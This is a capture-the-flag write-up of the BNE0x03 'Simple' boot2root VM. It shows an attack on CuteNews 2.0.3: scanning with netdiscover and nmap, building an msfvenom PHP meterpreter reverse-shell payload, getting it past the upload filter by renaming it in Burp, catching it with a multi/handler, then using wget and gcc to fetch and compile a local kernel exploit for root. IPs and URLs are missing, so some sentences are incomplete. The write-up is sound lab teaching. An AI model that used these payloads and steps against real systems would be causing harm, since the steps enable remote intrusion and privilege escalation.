SecTalks: BNE0x03 - Simple

May the LORD, my rock, be praised, who trains my hands for battle and my fingers for warfare. —- Psalm 144:1

From Vulhub Simple CTF is a boot2root that focuses on the basics of web based hacking. Once you load the VM, treat it as a machine you can see on the network, i.e. you don’t have physical access to this machine. Therefore, tricks like editing the VM’s BIOS or Grub configuration are not allowed. Only remote attacks are permitted. /root/flag.txt is your ultimate goal.


  • netdiscover
  • Nmap
  • Burp Suite
  • Metasploit

Detail Assessment and Planning

  • Port scan to identify opened ports, running services and services version. —Nmap
  • Search the web app vulnerability — searchsploit
  • Generate and upload webshell —metasploit
  • Get root

Waging War

Weaknesses and Strengths

Use netdiscover to detect target IP address

netdiscover -i eth0 -r is the target.

Then run nmap to detect opening ports and running services on the target machine.

nmap -sV -v -O -A -T5 -p-

Only port 80 is opening. Lets use Iceweasel to view the page.

I noticed that the web app is Cutenews 2.0.3. search the exploit:

searchsploit cutenews

find the interesting results:

The exploit is as follow:

Okay, firstly, I creat a reverse php shell,

msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=1234 -a php --platform php -o evil.jpg

Now, use Burp as proxy, go to Personal options to upload evil.jpg

in the burp, change the evil.jgp to evil.php

After that, Burp will recevied a GET request:

set metasploit multi/handler.

now go to will get meterpreter reverse shell:

However, I am not the root, search the os version:

search the ubuntu 14.04

searchsploit ubuntu 14.04 and we get the result:

Move the file to /var/www/html/ and in reverse shell:

wget -O hack.c

compile it:

gcc hack.c -o hack -static, run it.

then use python -c 'import pty; pty.spawn("/bin/bash")' to get the shell.